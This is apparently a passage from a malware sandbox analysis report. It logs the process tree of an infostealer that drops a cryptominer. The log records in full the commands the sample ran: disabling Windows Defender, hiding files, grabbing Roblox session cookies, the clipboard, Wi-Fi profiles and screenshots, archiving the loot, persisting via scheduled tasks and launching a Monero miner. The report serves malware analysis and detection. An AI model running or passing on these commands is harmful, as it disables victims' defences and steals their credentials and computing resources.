C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"5⤵
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:640 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4184 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""5⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"6⤵
- Views/modifies file attributes
PID:2412 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4424 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1472 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵
- Suspicious use of AdjustPrivilegeToken
PID:996 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4196 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4356 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5076
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:3104
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1364 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵PID:4488
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:3524 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵PID:3468
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mcapkfgi\mcapkfgi.cmdline"7⤵PID:4564
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB0D1.tmp" "c:\Users\Admin\AppData\Local\Temp\mcapkfgi\CSC4516B1FD489244CEAE9585B765C891BE.TMP"8⤵PID:2904
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:4772
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:996
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:1824
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:2428
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:4044
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:2168
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:2368
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:1880
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:3484
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:3124
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:4148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:2892
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:116 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵PID:864
-
C:\Windows\system32\getmac.exegetmac6⤵PID:4924
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI46362\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\J8jwL.zip" *"5⤵PID:3296
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4184
-
C:\Users\Admin\AppData\Local\Temp\_MEI46362\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI46362\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\J8jwL.zip" *6⤵
- Executes dropped EXE
PID:1488 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵PID:4460
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4628 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵PID:3568
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵PID:1592
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:912
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:2300
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵PID:1168
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:948 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:4180
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:1064 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵PID:3528
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2088 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe""5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1392 -
C:\Windows\system32\PING.EXEping localhost -n 36⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4668 -
C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe"C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Core Sound Service" /tr '"C:\Users\Admin\AppData\Roaming\Core Sound Service.exe"' & exit3⤵PID:644
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Core Sound Service" /tr '"C:\Users\Admin\AppData\Roaming\Core Sound Service.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:2848 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA76B.tmp.bat""3⤵PID:1784
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:2552 -
C:\Users\Admin\AppData\Roaming\Core Sound Service.exe"C:\Users\Admin\AppData\Roaming\Core Sound Service.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- System policy modification
PID:2828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4572 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\splwow64.exe"' & exit5⤵PID:3168
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\splwow64.exe"'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4336 -
C:\Users\Admin\AppData\Local\Temp\splwow64.exe"C:\Users\Admin\AppData\Local\Temp\splwow64.exe"7⤵
- Executes dropped EXE
PID:3560 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\splwow64.exe"8⤵
- Suspicious behavior: EnumeratesProcesses
PID:3828 -
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"9⤵PID:4128
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"10⤵
- Scheduled Task/Job: Scheduled Task
PID:3740 -
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\services64.exe"9⤵PID:4644
-
C:\Users\Admin\services64.exeC:\Users\Admin\services64.exe10⤵
- Executes dropped EXE
PID:3468 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\services64.exe"11⤵
- Suspicious use of SetThreadContext
PID:4904 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵
- Executes dropped EXE
PID:4208 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵PID:4892
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=83bM5DoDitniDg2ooQitzWKzapHhSvJmL8kn1dDcr4ST6wU8U6Cj7TN3FRXWJK3fDXNQBRf5TQ5qN2o1aCxi7vrxSi5T26L.ObamaNet --pass=johnlovesbbc --cpu-max-threads-hint=60 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=100 --tls --cinit-stealth12⤵PID:4104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3124
-
C:\Users\Admin\AppData\Roaming\Core Sound Service.exe"C:\Users\Admin\AppData\Roaming\Core Sound Service.exe"1⤵
- Executes dropped EXE
PID:4920
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
3Disable or Modify Tools
3Modify Registry
4Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Discovery
Process Discovery
1Query Registry
2Remote System Discovery
1System Information Discovery
5System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
2Internet Connection Discovery
1Wi-Fi Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
425B
MD5fff5cbccb6b31b40f834b8f4778a779a
SHA1899ed0377e89f1ed434cfeecc5bc0163ebdf0454
SHA256b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76
